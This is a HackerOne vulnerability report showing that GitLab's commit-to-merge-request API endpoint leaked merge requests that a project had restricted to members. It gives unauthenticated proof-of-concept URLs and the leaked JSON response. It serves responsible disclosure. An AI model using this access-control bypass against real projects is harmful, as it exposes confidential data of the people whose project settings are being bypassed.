Private MR Disclosed Through Related MR Commit API endpoint
HackerOne report #453400 by ngalog on 2018-12-01:
Summary:
A public project could set MRs to be accessible only by project members. (Project Settings -> Permissions)
After setting that permission, non-members will see a 403 when they visit https://{gitlab}/api/v4/projects/{id}/merge_requests
However when they visit /projects/:id/repository/commits/:sha/merge_requests
, the details of the MR is disclosed nonetheless.
Reference: (API)[https://docs.gitlab.com/ee/api/commits.html#list-merge-requests-associated-with-a-commit]
Quick PoC in gitlab.com
- Visit https://gitlab.com/api/v4/projects/9696224/merge_requests without any session, you should expect to see 403. it proves MR of this project is confidential, not open to public.
- Visit https://gitlab.com/api/v4/projects/9696224/repository/commits/f4ec51c29fdbf71c85e14809c21328135ba75c9f/merge_requests without any session, you should see below response
[
{
"id": 20154978,
"iid": 3,
"project_id": 9696224,
"title": "Suppose to be privaet merge request",
"description": "privaet MR",
"state": "opened",
"created_at": "2018-11-30T23:47:26.027Z",
"updated_at": "2018-11-30T23:57:11.196Z",
"merged_by": null,
"merged_at": null,
"closed_by": null,
"closed_at": null,
"target_branch": "master",
"source_branch": "mastera",
"upvotes": 0,
"downvotes": 0,
"author": {
"id": 3012741,
"name": "Ashley Johnson",
"username": "ashleyjohnson",
"state": "active",
"avatar_url": "https://secure.gravatar.com/avatar/ee7d3f1eafcb8903d47527c1590722f4?s=80&d=identicon",
"web_url": "https://gitlab.com/ashleyjohnson"
},
"assignee": null,
"source_project_id": 9696224,
"target_project_id": 9696224,
"labels": [],
"work_in_progress": false,
"milestone": null,
"merge_when_pipeline_succeeds": false,
"merge_status": "can_be_merged",
"sha": "f4ec51c29fdbf71c85e14809c21328135ba75c9f",
"merge_commit_sha": null,
"user_notes_count": 0,
"discussion_locked": null,
"should_remove_source_branch": null,
"force_remove_source_branch": false,
"web_url": "https://gitlab.com/new-jjj-groupaaa/newnewthing/merge_requests/3",
"time_stats": {
"time_estimate": 0,
"total_time_spent": 0,
"human_time_estimate": null,
"human_total_time_spent": null
},
"squash": false,
"approvals_before_merge": null
}
]
Impact
MR disclosure